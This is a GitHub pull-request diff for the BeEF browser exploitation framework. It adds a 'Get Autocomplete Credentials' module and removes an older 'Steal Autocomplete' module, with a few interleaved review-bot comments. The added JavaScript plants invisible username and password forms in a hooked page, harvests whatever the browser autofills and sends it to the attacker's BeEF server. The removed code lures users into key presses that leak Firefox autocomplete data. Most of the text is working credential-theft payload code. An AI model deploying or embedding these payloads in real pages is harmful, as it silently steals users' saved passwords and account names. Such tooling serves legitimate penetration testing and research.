Merge pull request #1874 from bcoles/autocomplete_theft

Replace autocomplete_theft with get_autocomplete_creds
jcrew99
2020-04-24 10:06:52 +10:00
committed by GitHub
6 changed files with 107 additions and 140 deletions


@@ -0,0 +1,74 @@
//
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
get_form_data = function(form_name) {
var f = document.getElementById(form_name);
var results = '';
for(i=0; i<f.elements.length; i++) {
var k = f.elements[i].id;
var v = f.elements[i].value;
if (v != '') {
results += k + '=' + v + '&';
}
}
if (results == '') {
beef.debug("[Get Autocomplete Creds] Found no autocomplete credentials");
return;
}
beef.debug("[Get Autocomplete Creds] Found autocomplete data: '" + results + "'");
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'results=' + results, beef.are.status_success());
}
create_form = function(input_name) {
var f = document.createElement("form");
f.setAttribute("id", "get_autocomplete_" + input_name + "_<%= @command_id %>");
f.setAttribute("style", "position:absolute;visibility:hidden;top:-1000px;left:-1000px;width:1px;height:1px;border:none;");
var u_input = document.createElement('input');
u_input.setAttribute("id", input_name);
u_input.setAttribute("name", input_name);
u_input.setAttribute("style", "position:absolute;visibility:hidden;top:-1000px;left:-1000px;width:1px;height:1px;border:none;");
u_input.setAttribute("type", "text");
f.appendChild(u_input);
var p_input = document.createElement('input');
p_input.setAttribute("id", "password");
p_input.setAttribute("name", "password");
p_input.setAttribute("style", "position:absolute;visibility:hidden;top:-1000px;left:-1000px;width:1px;height:1px;border:none;");
p_input.setAttribute("type", "password");
f.appendChild(p_input);
document.body.appendChild(f);
}
var inputs = [
'user',
'uname',
'username',
'user_name',
'login',
'loginname',
'login_name',
'email',
'emailaddress',
'email_address',
'session[username_or_email]',
'name'
];
beef.debug("[Get Autocomplete Creds] Creating forms ...");
for(i=0; i<inputs.length; i++) {
var input_name = inputs[i];
create_form(input_name);
setTimeout("get_form_data('get_autocomplete_" + input_name + "_<%= @command_id %>'); document.body.removeChild(document.getElementById('get_autocomplete_" + input_name + "_<%= @command_id %>'));", 2000);
}
});
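Review bot: The debug call on the "Found autocomplete data" line writes the collected field values, including the password input's value, verbatim into the debug output, so recovered credentials land in a second channel besides the command result. Logging only the form id keeps engagement logs free of client secrets, e.g. `beef.debug("[Get Autocomplete Creds] Found autocomplete data in form '" + form_name + "'");`. Separately, `get_form_data`, `create_form` and the loop counter `i` are assigned without `var`, so they become globals on the page under test and can overwrite page variables of the same name. Declaring them with `var` keeps the module's side effects on the tested application contained.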


@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
get_autocomplete_creds:
enable: true
category: ["Browser", "Hooked Domain"]
name: "Get Autocomplete Credentials"
description: "This module steals saved credentials for the hooked domain.<br/><br/>Tested on Firefox 68 and Chrome 49.<br/><br/>Note: On Firefox, the window must have focus."
authors: ["bcoles"]
target:
working: ["FF", "C"]
not_working: ["ALL"]


@@ -0,0 +1,17 @@
#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Get_autocomplete_creds < BeEF::Core::Command
def self.options
[]
end
def post_execute
content = {}
content['results'] = @datastore['results']
save content
end
end
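Review bot: `post_execute` stores `@datastore['results']` exactly as the hooked browser sent it, and nothing in this file documents that the value is untrusted and may hold cleartext credentials. A comment above the method would make that explicit, e.g. `# 'results' is the raw 'id=value&' string from the hooked browser: untrusted input, may contain cleartext credentials`. Whether the value is size-bounded or escaped when displayed is not visible in this section, so it is worth confirming in the code that consumes `save`. Because the stored record holds client secrets, the note should also point operators to the engagement's data-handling rules for the results database.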


@@ -1,75 +0,0 @@
//
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
steal_autocomplete = function() {
var results = [];
// hijack keys and set focus
get_autocomplete = function (){
window.addEventListener("keydown",function(e){
switch(e.keyCode) {
case 37: // left
scrollTo(window.pageXOffset-20, window.pageYOffset);
break;
case 38: // up
scrollTo(window.pageXOffset, window.pageYOffset-20);
break;
case 39: // right
scrollTo(window.pageXOffset+20, window.pageYOffset);
break;
case 40: // down
scrollTo(window.pageXOffset, window.pageYOffset+20);
break;
default:break;
}
},false);
document.getElementById("placeholder").focus();
}
inArray = function(el, arr){
for (var i = 0;i < arr.length;i++)
if (el===arr[i])
return true;
return false;
}
steal = function(n,v) {
var val = JSON.stringify({'input':n,'value':v});
if (v != "" && !inArray(val,results)){
results.push(val);
beef.debug("[Module - autocomplete_theft] Found saved string: '" + val + "'");
beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val);
}
}
tt = function(ev) {
if (ev.keyCode == 37 || ev.keyCode == 39) setTimeout(function(){ ev.target.blur(); },100);
}
// create hidden input element
input = document.createElement('input');
input.setAttribute("id", "placeholder");
input.setAttribute("name", "<%= @input_name %>");
input.setAttribute("style", "position:relative;top:-1000px;left:-1111px;width:1px;height:1px;border:none;");
input.setAttribute("type", "text");
input.onkeyup = function(event) { tt(event); }
input.onkeydown = function(event) { tt(event); }
input.onblur = function(event) { steal(this.name,this.value);var o=this;setTimeout(function(){ o.focus();},100);this.value = "";document.body.removeChild(this); }
document.body.appendChild(input);
// steal autocomplete
get_autocomplete();
}
setTimeout("steal_autocomplete();", 100);
});


@@ -1,16 +0,0 @@
#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
steal_autocomplete:
enable: true
category: "Social Engineering"
name: "Steal Autocomplete"
description: "This module steals autocomplete values from Firefox. The user must press the up or down arrow keys twice, followed by the left or right arrow key, in order to steal autocomplete information.<br/>Hint: Try convincing the user to enter the Konami code (Up, Up, Down, Down, Left, Right, Left, Right, B, A, Enter)."
authors: ["Stefano Di Paola", "bcoles"]
target:
working: ["FF"]
not_working: ["ALL"]


@@ -1,49 +0,0 @@
#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
################################################################################
# Based on the PoC by Stefano Di Paola
# Ported to BeEF by bcoles
# For more information see: http://blog.mindedsecurity.com/2011/10/autocompleteagain.html
################################################################################
class Steal_autocomplete < BeEF::Core::Command
def self.options
return [
{ 'name' => 'input_name',
'type' => 'combobox',
'ui_label' => 'Input Field Name',
'store_type' => 'arraystore',
'store_fields' => ['element_name'],
'store_data' => [
['login'],
['email'],
['Email'],
['session[username_or_email]'],
['q'],
['search'],
['name'],
['company'],
['city'],
['state'],
['country'],
],
'emptyText' => 'Select an input field name to steal autocomplete values',
'valueField' => 'element_name',
'displayField' => 'element_name',
'mode' => 'local',
'autoWidth' => true
}
]
end
def post_execute
content = {}
content['results'] = @datastore['results']
save content
end
end